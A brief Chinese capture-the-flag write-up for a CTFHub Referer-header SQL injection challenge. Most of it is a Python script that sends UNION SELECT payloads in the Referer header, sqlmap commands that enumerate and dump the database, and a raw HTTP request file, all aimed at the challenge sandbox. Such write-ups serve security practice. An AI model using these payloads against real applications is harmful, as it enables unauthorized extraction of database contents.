ctfhub技能樹—sql注入—Refer注入

手注

查詢數據庫名

查詢數據表名

查詢字段名

查詢字段信息

腳本（from 阿狸）

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
url = "http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/"
import requests
def postPL(pl = '', mask=['</code></br>ID: 1</br>','</div>']):
    headers = {'referer':pl}
    req = requests.post(url,headers=headers).text
    return req[req.find(mask[0])+len(mask[0]):req.find(mask[1],req.find(mask[0]))]

print(postPL('-1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema=database()'))
print(postPL('-1 union select 1 , group_concat(column_name) from information_schema.columns where table_name="mpiqfobzkz"'))
print(postPL('-1 union select 1 , cppsiqpthc from mpiqfobzkz'))

sqlmap（速度較慢，耐心等待）

方法一

代碼如下

python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 --dbs
python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables
python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz --columns
python2 sqlmap.py -u http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump

方法二

嘗試注入，成功返回結果

將如下內容保存到sqlmap根目錄下

POST / HTTP/1.1
Host: challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://challenge-c58db5e5b714ee25.sandbox.ctfhub.com:10080
Connection: close
Referer: 1
Upgrade-Insecure-Requests: 1

使用如下命令查詢(referer.txt是保存在sqlmap根目錄下的文件名)

python2 sqlmap.py -r referer.txt --level 5 --dbs
python2 sqlmap.py -r referer.txt --level 5 -D sqli --tables
python2 sqlmap.py -r referer.txt --level 5 -D sqli -T mpiqfobzkz --columns
python2 sqlmap.py -r referer.txt --level 5 -D sqli -T mpiqfobzkz -C cppsiqpthc --dump